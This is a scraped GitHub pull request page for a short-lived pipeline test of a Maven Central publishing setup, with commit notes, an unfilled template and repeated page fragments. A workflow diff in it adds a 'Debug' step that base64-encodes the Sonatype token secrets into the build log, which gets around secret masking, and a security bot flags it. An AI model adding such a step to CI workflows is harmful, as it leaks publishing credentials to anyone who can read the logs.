Pipeline test #775

atextor · 2025-06-20T12:36:49Z

Description

Please include a summary of the changes and the related issue. List any dependencies that are required for this change.

Fixes #(number of issue in GitHub)

Type of change

Please delete options that are not relevant.

Bug fix (non-breaking change which fixes an issue)
New feature (non-breaking change which adds functionality)
Breaking change (fix or feature that would cause existing functionality to not work as expected)

Checklist:

My code follows the style guidelines of this project
I have performed a self-review of my own code
I have commented my code, particularly in hard-to-understand areas
I have made corresponding changes to the documentation
My changes generate no new warnings
I have added tests that prove my fix is effective or that my feature works

Additional notes:

Add any other notes or comments here.

Not required with GraalVM JDK 21+ (gu tool has been removed)

Since native-image is not actually executed, the reporting is pointless

Secret names are wrong; also The "skipDeployment" feature is used so that the release job just pushes the previously build deploy bundle

This is necessary because otherwise, central-publishing-maven-plugin will complain about no artifact being bound to the documentation module

.github/workflows/test.yml

+    runs-on: ubuntu-latest
+    steps:
+      - name: Debug
+        run: |
+          echo "${{ secrets.CENTRAL_SONATYPE_TOKEN_USERNAME }}" > a
+          echo "${{ secrets.CENTRAL_SONATYPE_TOKEN_PASSWORD }}" > b
+          cat a | base64
+          cat b | base64


To fix the issue, we will add a permissions block at the root of the workflow file. This block will specify the least privileges required for the workflow to function. Since the workflow does not appear to require write access to any resources, we will set contents: read as the minimal permission. This ensures the workflow can read repository contents but cannot modify them.

atextor added 9 commits June 20, 2025 10:53

Remove components configuration for setup-graalvm

165353a

Not required with GraalVM JDK 21+ (gu tool has been removed)

Configure central-publishing-maven-plugin in root project

356e68a

Disable native-image reporting on MacOS build

9e3b71b

Since native-image is not actually executed, the reporting is pointless

Fix deploy pipeline configuration

90dc729

Secret names are wrong; also The "skipDeployment" feature is used so that the release job just pushes the previously build deploy bundle

Setup Maven Central configuration for Linux build job

76991cb

Enable .jar in documentation project

a32c8d3

This is necessary because otherwise, central-publishing-maven-plugin will complain about no artifact being bound to the documentation module

Create Maven Central bundle from "central-staging" directory

58c17e0

Add test pipeline

acb53b5

Update test pipeline

56bb997

github-advanced-security bot found potential problems Jun 20, 2025

View reviewed changes

.github/workflows/test.yml Fixed Show fixed Hide fixed

Update test pipeline

264dd59

github-advanced-security bot found potential problems Jun 20, 2025

View reviewed changes

.github/workflows/test.yml Fixed Show fixed Hide fixed

Update test pipeline

f2930a8

github-advanced-security bot found potential problems Jun 20, 2025

View reviewed changes

atextor closed this Jun 20, 2025

atextor deleted the pipeline-test branch June 20, 2025 12:43

@@ -13,2 +13,5 @@
+            permissions:
+              contents: read
             jobs:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Pipeline test #775

Pipeline test #775

Uh oh!

atextor commented Jun 20, 2025

Uh oh!

Uh oh!

Uh oh!

Check warning

Copilot Autofix

Uh oh!

Pipeline test #775

Pipeline test #775

Uh oh!

Conversation

atextor commented Jun 20, 2025

Description

Type of change

Checklist:

Additional notes:

Uh oh!

Uh oh!

Uh oh!

Check warning

Copilot Autofix

Uh oh!